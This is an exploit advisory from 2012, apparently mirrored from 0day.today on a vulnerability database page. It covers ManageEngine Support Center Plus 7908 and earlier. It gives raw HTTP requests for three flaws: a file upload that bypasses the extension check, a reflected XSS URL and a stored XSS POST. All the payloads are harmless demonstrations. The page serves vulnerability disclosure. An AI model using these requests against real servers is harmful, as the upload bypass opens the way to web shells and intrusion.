Lucene search
K

ManageEngine Support Center Plus <= 7908 Multiple Vulnerabilities

🗓️ 16 Oct 2012 00:00:00Reported by xistenceType 
zdt
 zdt
🔗 0day.today👁 20 Views

ManageEngine Support Center Plus <= 7908 Multiple Vulnerabilities repor

Code
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title     : ManageEngine Support Center Plus <= 7908 Multiple Vulnerabilities
# Date              : 06-03-2012
# Author            : xistence (xistence<[AT]>0x90.nl)
# Software link     : http://www.manageengine.com/products/support-center/64045241/ManageEngine_SupportCenter_Plus_7_9_0_SP-0_8_0.ppm
# Vendor site       : http://www.manageengine.com/
# Version           : 7908 and lower
# Tested on         : CentOS 5.x
+--------------------------------------------------------------------------------------------------------------------------------+
 
 
1) Arbitrary File Upload (File Extension Verification Bypass)
 
It's possible to bypass the image extension check in the ticket creation editor. Normally you would go to Requests -> New Request -> select the "Insert Image" to upload a picture to be included in the ticket and is restricted to jpg/gif/png files. If you send a POST request directly to the /jsp/UploadImage.jsp?Module=Workorder url you'll be able to upload any file. This might lead to uploading web site files which could be used for malicious actions (backdoors/shells).
 
Below a sample POST request, note that a valid cookie is needed (and be authenticated) to perform these actions. The POST request uploads a file test.txt with the contents "TEST!"
 
POST /jsp/UploadImage.jsp?Module=WorkOrder HTTP/1.1
Host: exploitme:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 231
Content-Type: multipart/form-data; boundary=---------------------------135769595918512168611930018855
Content-Length: 231
 
-----------------------------135769595918512168611930018855
Content-Disposition: form-data; name="img_file"; filename="test.txt"
Content-Type: image/gif
 
TEST!
 
-----------------------------135769595918512168611930018855--
 
 
 
In the HTTP response you'll see this:
 
<script>var formName = parent.document.getElementById("FORMNAME").value;
  var opts = parent.document.forms[formName].INLINEIMAGES.options;
  var imgName = "1340090056957.txt";
  var option = new Option(imgName, imgName);
  option.selected = true;
  opts[opts.length] = option;
  // parent.showImage("WorkOrder","2","1340090056957.txt");
  parent.ZE.activeEditor.previewImage("/inline/"+"WorkOrder"+"/"+"2"+"/"+"1340090056957.txt");//No i18n</script>
 
Which makes the following url accessable and will show the "TEST!" in clear text:
http://<IP ADDRESS>:8080/inline/WorkOrder/2/1340090056957.txt
 
 
2) Reflected XSS
 
Proof of Concept:
http://<IP ADDRESS>:8080/HomePage.do?fromCustomer=%27;alert%28%22Hello%20World%22%29;%20var%20frompor=%27null
 
 
3) Stored XSS vulnerability
 
How to replicate:
 
Requests -> New Request
Subject: anything
Description window -> select Edit HTML button -> Insert script code i.e.: <script>alert("Hello World")</script>
 
POST request headers:
 
POST /WorkOrder.do HTTP/1.1
Host: exploitme:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 312
 
reqTemplate=&prodId=0&priority=2&reqID=2&usertypename=Requester&reqName=Guest&category=0&item=0&subCategory=0&title=bla&description=bla%3Cscript%3Ealert%28%22Hello+World%22%29%3C%2Fscript%3E&MOD_IND=WorkOrder&FORMNAME=WorkOrderForm&attach=&attPath=&component=Request&attSize=&attachments=&autoCCList=&addWO=addWO



#  0day.today [2018-03-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation